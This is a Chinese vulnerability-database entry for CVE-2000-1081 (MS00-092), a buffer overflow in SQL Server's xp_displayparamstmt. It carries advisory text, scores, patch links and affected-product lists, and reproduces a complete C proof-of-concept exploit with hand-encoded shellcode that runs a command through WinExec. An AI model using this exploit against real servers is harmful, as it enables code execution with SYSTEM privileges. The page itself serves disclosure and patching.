CVE-2000-1081
CVSS4.6
发布时间 :2001-01-09 00:00:00
修订时间 :2016-10-17 22:08:25
NMCOES    

[原文]The xp_displayparamstmt function in SQL Server and Microsoft SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability.


[CNNVD]Microsoft SQL Server/MSDE扩展存储过程远程缓冲区溢出漏洞(MS00-092)(CNNVD-200101-037)

        
        在微软SQL Server 7.0/2000以及MSDE中以及提供了一个API函数srv_paraminfo(),它用来为扩展存储过程调用解释输入参数。由于它没有对输入参数长度进行检查,因此如果输入参数长度超过一定限制,就可能发生缓冲区溢出。任何在调用srv_paraminfo()前没有进行长度检查的扩展存储过程都可能受到此问题影响。
        调用扩展存储过程的语法如下所示:
        exec <存储过程名> <参数1>, <参数2>, ...
        例如,如下的查询将返回"c:\winnt"的目录树:
        exec xp_dirtree 'c:\winnt'
        通过给各个参数传递超长的字符串,有可能覆盖为这些参数所分配的缓冲区并执行任意代码。
        目前已知受影响的扩展存储过程如下:
        1、xp_peekqueue (xpqueue.dll)
         xp_printstatements (xprepl.dll)
        
         给第一个参数传递超长的串将导致非法操作并覆盖异常处理程序所保存的返回地址。
        2、xp_proxiedmetadata (xprepl.dll)
         该存储过程使用4个参数。给第二个参数传递超长的串将导致非法操作并覆盖异常处理程序所保存的返回地址。
        
        3、xp_SetSQLSecurity (xpstar.dll)
         该存储过程使用4个参数。给第三个参数传递超长的串将引发异常并导致整个SQL Server进程立即终止。
        
        4、xp_displayparamstmt(xprepl.dll)
         xp_enumresultset(xprepl.dll)
         xp_showcolv (xprepl.dll)
         xp_updatecolvbm (xprepl.dll)
        
         给第一个参数传递超长的串将导致非法操作并覆盖异常处理程序所保存的返回地址。
        
        扩展存储过程可以被任何客户组件调用,只要这些客户组件能够执行普通的SQLServer查询,比如Microsoft Access或者MSQuery。SQL Server中提供的ISQL实用程序也可以用来调用扩展存储过程。运行于IIS之上的web应用程序频繁地使用ADO(ActiveX Data Objects)API来连接SQL Server数据库。
        攻击者可能通过两种途径进行攻击:
        1. 如果攻击者可以登录进入SQL Server数据库,就可以通过直接调用有问题的扩展存储过程来进行攻击。如果溢出成功,可能获取SYSTEM权限。
        2. 攻击者也可能通过Web应用程序来进行攻击,但是需要攻击者了解应用程序在何处调用了有问题的扩展存储过程,同时提供有效的参数。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:sql_server:2000Microsoft SQL Server 2000
cpe:/a:microsoft:data_engine:1.0Microsoft data_engine 1.0
cpe:/a:microsoft:sql_server:7.0Microsoft SQLServer 7.0
cpe:/a:microsoft:data_engine:2000Microsoft data_engine 2000

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:231SQL Server Extended Stored Procedure Parameter Parsing
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1081
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1081
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200101-037
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=97570878710037&w=2
(UNKNOWN)  ATSTAKE  20001201 Microsoft SQL Server extended stored procedure vulnerability
http://www.microsoft.com/technet/security/bulletin/ms00-092.asp
(VENDOR_ADVISORY)  MS  MS00-092
http://www.securityfocus.com/bid/2030
(VENDOR_ADVISORY)  BID  2030

- 漏洞信息

Microsoft SQL Server/MSDE扩展存储过程远程缓冲区溢出漏洞(MS00-092)
中危 边界条件错误
2001-01-09 00:00:00 2006-09-01 00:00:00
本地  
        
        在微软SQL Server 7.0/2000以及MSDE中以及提供了一个API函数srv_paraminfo(),它用来为扩展存储过程调用解释输入参数。由于它没有对输入参数长度进行检查,因此如果输入参数长度超过一定限制,就可能发生缓冲区溢出。任何在调用srv_paraminfo()前没有进行长度检查的扩展存储过程都可能受到此问题影响。
        调用扩展存储过程的语法如下所示:
        exec <存储过程名> <参数1>, <参数2>, ...
        例如,如下的查询将返回"c:\winnt"的目录树:
        exec xp_dirtree 'c:\winnt'
        通过给各个参数传递超长的字符串,有可能覆盖为这些参数所分配的缓冲区并执行任意代码。
        目前已知受影响的扩展存储过程如下:
        1、xp_peekqueue (xpqueue.dll)
         xp_printstatements (xprepl.dll)
        
         给第一个参数传递超长的串将导致非法操作并覆盖异常处理程序所保存的返回地址。
        2、xp_proxiedmetadata (xprepl.dll)
         该存储过程使用4个参数。给第二个参数传递超长的串将导致非法操作并覆盖异常处理程序所保存的返回地址。
        
        3、xp_SetSQLSecurity (xpstar.dll)
         该存储过程使用4个参数。给第三个参数传递超长的串将引发异常并导致整个SQL Server进程立即终止。
        
        4、xp_displayparamstmt(xprepl.dll)
         xp_enumresultset(xprepl.dll)
         xp_showcolv (xprepl.dll)
         xp_updatecolvbm (xprepl.dll)
        
         给第一个参数传递超长的串将导致非法操作并覆盖异常处理程序所保存的返回地址。
        
        扩展存储过程可以被任何客户组件调用,只要这些客户组件能够执行普通的SQLServer查询,比如Microsoft Access或者MSQuery。SQL Server中提供的ISQL实用程序也可以用来调用扩展存储过程。运行于IIS之上的web应用程序频繁地使用ADO(ActiveX Data Objects)API来连接SQL Server数据库。
        攻击者可能通过两种途径进行攻击:
        1. 如果攻击者可以登录进入SQL Server数据库,就可以通过直接调用有问题的扩展存储过程来进行攻击。如果溢出成功,可能获取SYSTEM权限。
        2. 攻击者也可能通过Web应用程序来进行攻击,但是需要攻击者了解应用程序在何处调用了有问题的扩展存储过程,同时提供有效的参数。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 数据库管理员应该限制这些有问题的存储过程的访问权限,只允许数据库管理员访问。
        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS00-092)以及相应补丁:
        MS00-092:Patch Available for "Extended Stored Procedure Parameter Parsing" Vulnerability
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS00-092.asp

        补丁下载:
        
        http://support.microsoft.com/support/sql/xp_security.asp

- 漏洞信息 (20451)

Microsoft SQL Server 7.0/2000,Data Engine 1.0/2000 xp_displayparamstmt Buffer Overflow Vulnerability (EDBID:20451)
windows local
2000-12-01 Verified
0 David Litchfield
N/A [点击下载]
source: http://www.securityfocus.com/bid/2030/info

The API Srv_paraminfo(), which is implemented by Extended Stored Procedures (XPs) in Microsoft SQL Server and Data Engine, is susceptible to a buffer overflow vulnerability which may cause the application to fail or arbitrary code to be executed on the target system depending on the data entered into the buffer.

XPs are DLL files that perform high level functions in SQL Server. When called, they invoke a function called Srv_paraminfo() to parse the input parameters.

A vulnerability lies in Srv_paraminfo() and the fact that it does not check the length of the parameter string that an XP passes to it. If an attacker can pass an overly long string to the XP xp_displayparamstmt, a buffer overflow can occur due to an unsafe memory copy. This can cause SQL Server to crash.

It may also be possible for attackers to execute arbitrary code on the host running SQL Server. The attacker would need to overwrite the return address of the calling function with the address of supplied shellcode in memory. This shellcode would be executed under the context of the account that the SQL Server service was configured to run under. The minimum privilege level that the account would have to possess are SYSTEM privileges.

This vulnerability is confined to those who can successfully log onto the SQL server. 

#include <stdio.h>
#include <windows.h>
#include <wchar.h>
#include <lmcons.h>
#include <sql.h>
#include <sqlext.h>


int main(int argc, char *argv[])
{
	char szBuffer[1025];  //display successful connection info on
                              //hdbc(s) combo-box    
	SWORD     swStrLen;               //String length   
	SQLHDBC   hdbc;                   //hdbc    
	SQLRETURN nResult;             
	SQLHANDLE henv;
	HSTMT  hstmt;
	SCHAR InConnectionString[1025] = "DRIVER={SQL Server};SERVER=";
	SCHAR server[100]="";
	SCHAR uid[32]=";UID=";
	SCHAR pwd[32]=";PWD=";
	SCHAR *db=";DATABASE=master";

	UCHAR query[20000] = "exec  xp_displayparamstmt '";
	unsigned char ch=0x01;

	int count = 27, var =0, result = 0, chk =0;
	
	if(argc !=4)
	{
		printf("USAGE:\t%s host uid pwd\nDavid Litchfield 9th November 2000\n",argv[0]);
		return 0;
	}

	strncpy(server,argv[1],96);
	strncat(uid,argv[2],28);
	strncat(pwd,argv[3],28);

	strncat(InConnectionString,server,96);
	strncat(InConnectionString,uid,28);
	strncat(InConnectionString,pwd,28);
	strcat(InConnectionString,db);


	while(count < 12083)
	{
			query[count]=0x90;
			count++;
	}

	// jmp eax
	query[count++]=0xFF;
	query[count++]=0xE0;
	
	// nops
	query[count++]=0x90;
	query[count++]=0x90;

	// overwrite saved return address
	query[count++]=0xAE;
	query[count++]=0x20;
	query[count++]=0xA6;
	query[count++]=0x41;

	// code starts in ernest

	query[count++]=0x90;
	// mov edx,eax
	query[count++]=0x8B;
	query[count++]=0xD0;

	// add edx,0x52 <- points to our string table
	query[count++]=0x83;
	query[count++]=0xC2;
	query[count++]=0x52;

	// push ebp
	query[count++]=0x55;

	// mov ebp,esp
	query[count++]=0x8B;
	query[count++]=0xEC;

	// mov edi,0x41A68014
	query[count++]=0xBF;
	query[count++]=0x14;
	query[count++]=0x80;
	query[count++]=0xA6;
	query[count++]=0x41;


	//mov esi,0x41A68040
	query[count++]=0xBE;
	query[count++]=0x40;
	query[count++]=0x80;
	query[count++]=0xA6;
	query[count++]=0x41;

	// mov ecx, 0xFFFFFFFF
	query[count++]=0xB9;
	query[count++]=0xFF;
	query[count++]=0xFF;
	query[count++]=0xFF;
	query[count++]=0xFF;


	 

	// sub ecx, 0xFFFFFFB3
	query[count++]=0x83;
	query[count++]=0xE9;
	query[count++]=0xB3;

	// here:

	// sub dword ptr[edx],1
	query[count++]=0x83;
	query[count++]=0x2A;
	query[count++]=0x01;

	// add edx,1
	query[count++]=0x83;
	query[count++]=0xC2;
	query[count++]=0x01;

	// sub ecx,1
	query[count++]=0x83;
	query[count++]=0xE9;
	query[count++]=0x01;

	// test ecx,ecx
	query[count++]=0x85;
	query[count++]=0xC9;

	// jne here
	query[count++]=0x75;
	query[count++]=0xF3;

	// sub edx, 0x48
	query[count++]=0x83;
	query[count++]=0xEA;
	query[count++]=0x48;

	// push edx <- calling LoadLibrary will mess edx so save it on stack
	// Even though we're about to push edx as an arg to LoadLibrary
	// we have to push it twice as LoadLibrary will remove one of them
	// from the stack - once the call has returned pop it back into edx

	query[count++]=0x52; 

	// LoadLibrary("kernel32.dll");
	// push edx
	query[count++]=0x52;

	// call [edi]
	query[count++]=0xFF;
	query[count++]=0x17;


	
	// pop edx
	query[count++]=0x5A;


	// On return LoadLibrary has placed a handle in EAX
	// save this on this stack for later use
	// push eax
	query[count++]=0x50;


	// GetProcAddress(HND,"WinExec");
	// add edx, 0x10
	query[count++]=0x83;
	query[count++]=0xC2;
	query[count++]=0x10;


	// push edx
	// need to save this again - pop it when GetProcAddress returns

	query[count++]=0x52;

	//push edx
	query[count++]=0x52;

	// push eax
	query[count++]=0x50;

	// call [esi]
	query[count++]=0xFF;
	query[count++]=0x16;

	// pop edx
	query[count++]=0x5A;

	// WinExec("cmd.exe /c.....",SW_HIDE);
	// add edx, 0x08
	query[count++]=0x83;
	query[count++]=0xC2;
	query[count++]=0x08;


	// push edx
	query[count++]=0x52; // <- save edx

	// xor ebx,ebx
	query[count++]=0x33;
	query[count++]=0xDB;

	// push ebx
	query[count++]=0x53;

	// push edx
	query[count++]=0x52;

	// call eax
	query[count++]=0xFF;
	query[count++]=0xD0;


	// With the shell spawned code now calls ExitProcess()

	//pop edx
	query[count++]=0x5A;

	
	// pop eax <- This is saved handle to kernel32.dll
	query[count++]=0x58;



	// GetProcAddress(HND,"ExitProcess");
	// add edx,0x24
	query[count++]=0x83;
	query[count++]=0xC2;
	query[count++]=0x24;


	// push edx
	query[count++]=0x52;

	// push eax
	query[count++]=0x50;

	// call [esi]
	query[count++]=0xFF;
	query[count++]=0x16;


	// call ExitProcess(0);
	// xor ebx,ebx
	query[count++]=0x33;
	query[count++]=0xDB;

	// push ebx
	query[count++]=0x53;

	// call eax
	query[count++]=0xFF;
	query[count++]=0xD0;


	// Here are our strings
	// kernel32.dll, WinExec, cmd.exe /c ... , ExitProcess
	// 1 has been added to each character to 'hide' the nulls
	// the loop will sub 1 from each char

	query[count++]=0x01;
	query[count++]=0x01;
	query[count++]=0x01;
	query[count++]=0x01;
	query[count++]=0x6c;
	query[count++]=0x66;
	query[count++]=0x73;
	query[count++]=0x6f;
	query[count++]=0x66;
	query[count++]=0x6d;
	query[count++]=0x34;
	query[count++]=0x33;
	query[count++]=0x2f;
	query[count++]=0x65;
	query[count++]=0x6d;
	query[count++]=0x6d;
	query[count++]=0x01;
	query[count++]=0x01;
	query[count++]=0x01;
	query[count++]=0x01;
	query[count++]=0x58;
	query[count++]=0x6a;
	query[count++]=0x6f;
	query[count++]=0x46;
	query[count++]=0x79;
	query[count++]=0x66;
	query[count++]=0x64;
	query[count++]=0x01;
	query[count++]=0x64;
	query[count++]=0x6e;
	query[count++]=0x65;
	query[count++]=0x2f;
	query[count++]=0x66;
	query[count++]=0x79;
	query[count++]=0x66;
	query[count++]=0x21;
	query[count++]=0x30;
	query[count++]=0x64;
	query[count++]=0x21;
	query[count++]=0x65;
	query[count++]=0x6a;
	query[count++]=0x73;
	query[count++]=0x21;
	query[count++]=0x3f;
	query[count++]=0x21;
	query[count++]=0x64;
	query[count++]=0x3b;
	query[count++]=0x5d;
	query[count++]=0x74;
	query[count++]=0x72;
	query[count++]=0x6d;
	query[count++]=0x70;
	query[count++]=0x77;
	query[count++]=0x66;
	query[count++]=0x73;
	query[count++]=0x73;
	query[count++]=0x76;
	query[count++]=0x6f;
	query[count++]=0x2f;
	query[count++]=0x75;
	query[count++]=0x79;
	query[count++]=0x75;
	query[count++]=0x01;
	query[count++]=0x01;
	query[count++]=0x46;
	query[count++]=0x79;
	query[count++]=0x6a;
	query[count++]=0x75;
	query[count++]=0x51;
	query[count++]=0x73;
	query[count++]=0x70;
	query[count++]=0x64;
	query[count++]=0x66;
	query[count++]=0x74;
	query[count++]=0x74;
	query[count++]=0x01;




	strcat(query,"',2,3");

	
	
	if (SQLAllocHandle(SQL_HANDLE_ENV,SQL_NULL_HANDLE,&henv) !=
SQL_SUCCESS)
		{
			printf("Error SQLAllocHandle");
			return 0;

		}

	if (SQLSetEnvAttr(henv, SQL_ATTR_ODBC_VERSION,(SQLPOINTER)
SQL_OV_ODBC3, SQL_IS_INTEGER) != SQL_SUCCESS)
		{
			printf("Error SQLSetEnvAttr");
			return 0;

		}


	if ((nResult = SQLAllocHandle(SQL_HANDLE_DBC,henv,(SQLHDBC FAR
*)&hdbc)) != SQL_SUCCESS) 
		{
			printf("SQLAllocHandle - 2");
			return 0;
			
		}

	nResult = SQLDriverConnect(hdbc, NULL, InConnectionString,
strlen(InConnectionString), szBuffer,  1024, &swStrLen,
SQL_DRIVER_COMPLETE_REQUIRED);      
	if(nResult == SQL_SUCCESS | nResult == SQL_SUCCESS_WITH_INFO)
		{

			printf("Connected to MASTER database...\n\n");
			SQLAllocStmt(hdbc,&hstmt);
		}

	else
	{
		printf("Couldn't connect.\n");
		return 0;
	}

	if(SQLExecDirect(hstmt,query,SQL_NTS) !=SQL_SUCCESS)
		{
			printf("\nBuffer has been  sent...c:\\sqloverrun.txt should now exist.");

			return 0;

		}
	printf("Buffer sent...");	
	


return 0;
}
		

- 漏洞信息

10147
Microsoft SQL Server xp_displayparamstmt Function Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability Patch / RCS
Exploit Public

- 漏洞描述

A remote overflow exists in SQL Server, SQL Server Data Engine and MSDE. They fail to properly check the length of the srv_paraminfo function resulting in a buffer overflow. With a specially crafted request, an attacker can cause execution of arbitrary code or a denial of service resulting in a loss of integrity and/or availability.

- 时间线

2000-12-01 Unknow
2000-12-01 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft SQL Server / Data Engine xp_displayparamstmt Buffer Overflow Vulnerability
Boundary Condition Error 2030
No Yes
2000-12-01 12:00:00 2009-07-11 03:56:00
Discovered by David Litchfield <dlitchfield@atstake.com> and publicized in Microsoft Security Bulletin (MS00-092) on December 1, 2000.

- 受影响的程序版本

Microsoft SQL Server 2000
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0
Microsoft SQL Server 7.0
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Data Engine 2000
+ Akiva WebBoard 6.1
+ BindView bv-Admin for Microsoft Exchange
+ BindView bv-Admin for Windows 7.0
+ BindView bv-Admin for Windows Migration
+ BindView bv-control for Active Directory 7.0.2
+ BindView bv-Control for Internet Security 7.0.1
+ BindView bv-Control for Microsoft Exchange 7.0
+ BindView bv-Control for Microsoft SQL Server 7.0.1
+ BindView bv-Control for Microsoft SQL Server 7.0
+ BindView bv-Control for Windows 7.0.2
+ CARI-RUSCO Secure Perfect 3.0
+ CCH Equity Compliance Insider Reporting Module
+ Collins Medical Plus 2000
+ Computer Associates Unicenter
+ Computer Associates Unicenter RC/Update 6.1
+ Computer Associates Unicenter RC/Update 6.0
+ CSIRO BioLink Software 1.5
+ DATA.TXT Corporation Time Matters 4.0
+ DATA.TXT Corporation Time Matters 3.0
+ Dell OpenManage IT Assistant 6.0
+ Dell OpenManage IT Assistant 5.0
+ Express Metrix Express Software Manager 6.0.2
+ Express Metrix Express Software Manager 6.0.1
+ Express Metrix Express Software Manager 6.0
+ Express Metrix Express Software Manager 5.0
+ Fluke Networks Optiview Network Inspector 5.0
+ HP Openview Internet Services 4.5
+ HP Openview Internet Services 4.0
+ HP Openview Operations for Windows 7.1
+ HP Openview Operations for Windows 7.0
+ HP Openview Operations for Windows 6.0
+ HP Openview Reporter 3.0
+ HP Openview Reporter 2.0.2
+ ISI Infortel for Windows 5.4
+ ISI Infortel for Windows 5.2
+ ISI Infortel for Windows 5.1
+ ISI Infortel for Windows 4.0
+ Journyx Timesheet 5.0
+ Journyx Timesheet 4.6
+ Journyx Timesheet 4.5 m3
+ Journyx Timesheet 4.5 m2
+ Journyx Timesheet 4.5
+ Journyx Timesheet 2.0
+ Microsoft .NET Framework 1.1
+ Microsoft .NET Framework 1.0 SP1
+ Microsoft .NET Framework 1.0
+ Microsoft .NET Framework SDK 1.0
+ Microsoft Application Center 2000
+ Microsoft Biztalk Server 2002 Partner Edition 0
+ Microsoft FrontPage 2000 Server Extensions SR 1.3
+ Microsoft FrontPage 2000 Server Extensions SR 1.2
+ Microsoft FrontPage 2000 Server Extensions SR 1.1
+ Microsoft FrontPage 2000 Server Extensions SR 1.0
+ Microsoft Great Plains 5.5.1
+ Microsoft Great Plains 7.0
+ Microsoft Great Plains 5.5
+ Microsoft Great Plains 5.0
+ Microsoft Office 2000 SP2
+ Microsoft Office 2000 SP1
+ Microsoft Office 2000
+ Microsoft Office 2000 Chinese Version
+ Microsoft Office 2000 Japanese Version
+ Microsoft Office 2000 Korean Version
+ Microsoft Office XP SP1
+ Microsoft Office XP
+ Microsoft Office XP Developer Edition
+ Microsoft Project Central Server
+ Microsoft SharePoint Portal Server 2001 SP1
+ Microsoft SharePoint Portal Server 2001
+ Microsoft SharePoint Team Services from Microsoft
+ Microsoft SQL Server 2000 SP3
+ Microsoft SQL Server 2000 SP2
+ Microsoft SQL Server 2000 SP1
+ Microsoft SQL Server 2000
+ Microsoft Visio 2000 Enterprise Edition
+ Microsoft Visio Enterprise Network Tools
+ Microsoft Visual FoxPro 7.0 SP1
+ Microsoft Visual FoxPro 7.0
+ Microsoft Visual FoxPro 6.0
+ Microsoft Visual Studio .NET Academic Edition 0
+ Microsoft Visual Studio .NET Enterprise Architect Edition
+ Microsoft Visual Studio .NET Enterprise Developer Edition
+ Microsoft Visual Studio .NET Professional Edition
+ Microsoft Visual Studio .NET Trial Edition 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows XP Embedded SP1
+ Microsoft Windows XP Embedded
+ MIP NonProfit Series Pro 4.5
+ MIP NonProfit Series Pro 4.4
+ MIP NonProfit Series Pro 4.3
+ NetSupport NetSupport TCO 4.5.1
+ NetSupport NetSupport TCO 4.5
+ Network Associates SupportMagic SQL 4.5
+ Okena StormWatch
+ Peachtree Software Timeslips 11.0
+ Peachtree Software Timeslips 10.0
+ Peachtree Software Timeslips 9.0
+ Peachtree Software Timeslips 9.0
+ Peachtree Software Timeslips 8.0
+ Peachtree Software Timeslips 7.0
+ Peachtree Software Timeslips 6.0
+ QiNetix CommVault Galaxy 4.0.1
+ SalesLogix Corporation SalesLogix 2000.0
+ SmartMax Software MailMax 5.0
+ TeleStream FlipFactory 3.0
+ TeleStream FlipFactory 2.0
+ TeleStream FlipFactory 1.2
+ Veritas Software Backup Exec for Windows Servers 9.0
+ VIGILANTe SecureScan NX 2.5
+ Visionary Systems Firehouse Software 5.4
+ Visionary Systems Firehouse Software 5.0.2 5
+ Visionary Systems Firehouse Software 5.0
+ Visionary Systems Firehouse Software 3.0.5
+ Wonderware InTouch 7.11
+ Xerox CentreWare Web 1.0
Microsoft Data Engine (MSDE) 1.0
+ Affymetrix Microarray Suite Software 5.0.1
+ Affymetrix Microarray Suite Software 5.0.1
+ Affymetrix Microarray Suite Software 5.0.1
+ Affymetrix Microarray Suite Software 5.0
+ Affymetrix Microarray Suite Software 5.0
+ Affymetrix Microarray Suite Software 5.0
+ Altiris Deployment Server 5.5
+ Altiris Deployment Server 5.5
+ Altiris Deployment Server 5.5
+ Altiris Deployment Server 5.0.1
+ Altiris Deployment Server 5.0.1
+ Altiris Deployment Server 5.0.1
+ Centennial UK Ltd Centennial Discovery 4.4
+ Centennial UK Ltd Centennial Discovery 4.4
+ Centennial UK Ltd Centennial Discovery 4.4
+ Compaq Insight Manager 7.0 SP1
+ Compaq Insight Manager 7.0 SP1
+ Compaq Insight Manager 7.0 SP1
+ Compaq Insight Manager 7.0
+ Compaq Insight Manager 7.0
+ Compaq Insight Manager 7.0
+ Gerber Technology WebPDM 3.9
+ Gerber Technology WebPDM 3.9
+ Gerber Technology WebPDM 3.9
+ McAfee ePolicy Orchestrator 2.5 SP1
+ McAfee ePolicy Orchestrator 2.5 SP1
+ McAfee ePolicy Orchestrator 2.5 SP1
+ McAfee ePolicy Orchestrator 2.5
+ McAfee ePolicy Orchestrator 2.5
+ McAfee ePolicy Orchestrator 2.5
+ McAfee ePolicy Orchestrator 2.0
+ McAfee ePolicy Orchestrator 2.0
+ McAfee ePolicy Orchestrator 2.0
+ McAfee ePolicy Orchestrator 1.1
+ McAfee ePolicy Orchestrator 1.1
+ McAfee ePolicy Orchestrator 1.1
+ McAfee ePolicy Orchestrator 1.0
+ McAfee ePolicy Orchestrator 1.0
+ McAfee ePolicy Orchestrator 1.0
- Microsoft Access 2000
- Microsoft Access 2000
- Microsoft Access 2000
- Microsoft Project Central Server
- Microsoft Project Central Server
- Microsoft Project Central Server
+ Microsoft SharePoint Team Services from Microsoft
+ Microsoft SharePoint Team Services from Microsoft
+ Microsoft SharePoint Team Services from Microsoft
- Microsoft Visual Studio 6.0
- Microsoft Visual Studio 6.0
- Microsoft Visual Studio 6.0
+ PowerQuest ControlCenter ST 2.0
+ PowerQuest ControlCenter ST 2.0
+ PowerQuest ControlCenter ST 2.0
+ PPM 2000 Incident Reporting and Investigation Management 5.1
+ PPM 2000 Incident Reporting and Investigation Management 5.1
+ PPM 2000 Incident Reporting and Investigation Management 5.1
+ Research In Motion Blackberry Enterprise Server 2.0 .0.65
+ Research In Motion Blackberry Enterprise Server 2.0 .0.65
+ Research In Motion Blackberry Enterprise Server 2.0 .0.65
+ Trend Micro Control Manager 2.5
+ Trend Micro Control Manager 2.5
+ Trend Micro Control Manager 2.5
+ Trend Micro Damage Cleanup Server 1.0
+ Trend Micro Damage Cleanup Server 1.0
+ Trend Micro Damage Cleanup Server 1.0
+ Vital Processing Services LLC POS-partner 2000 5.0.13
+ Vital Processing Services LLC POS-partner 2000 5.0.13
+ Vital Processing Services LLC POS-partner 2000 5.0.13
+ Vital Processing Services LLC POS-partner 2000 4.1.11
+ Vital Processing Services LLC POS-partner 2000 4.1.11
+ Vital Processing Services LLC POS-partner 2000 4.1.11
+ Websense Reporter 6.3.1
+ Websense Reporter 6.3.1
+ Websense Reporter 6.3.1

- 漏洞讨论

The API Srv_paraminfo(), which is implemented by Extended Stored Procedures (XPs) in Microsoft SQL Server and Data Engine, is susceptible to a buffer overflow vulnerability which may cause the application to fail or arbitrary code to be executed on the target system depending on the data entered into the buffer.

XPs are DLL files that perform high level functions in SQL Server. When called, they invoke a function called Srv_paraminfo() to parse the input parameters.

A vulnerability lies in Srv_paraminfo() and the fact that it does not check the length of the parameter string that an XP passes to it. If an attacker can pass an overly long string to the XP xp_displayparamstmt, a buffer overflow can occur due to an unsafe memory copy. This can cause SQL Server to crash.

It may also be possible for attackers to execute arbitrary code on the host running SQL Server. The attacker would need to overwrite the return address of the calling function with the address of supplied shellcode in memory. This shellcode would be executed under the context of the account that the SQL Server service was configured to run under. The minimum privilege level that the account would have to possess are SYSTEM privileges.

This vulnerability is confined to those who can successfully log onto the SQL server.

- 漏洞利用

@Stake &lt;researchlabs@atstake.com&gt; has released the following proof-of-concept code:

- 解决方案

Microsoft has released the following patches which eliminate the vulnerability:


Microsoft SQL Server 2000

Microsoft SQL Server 7.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站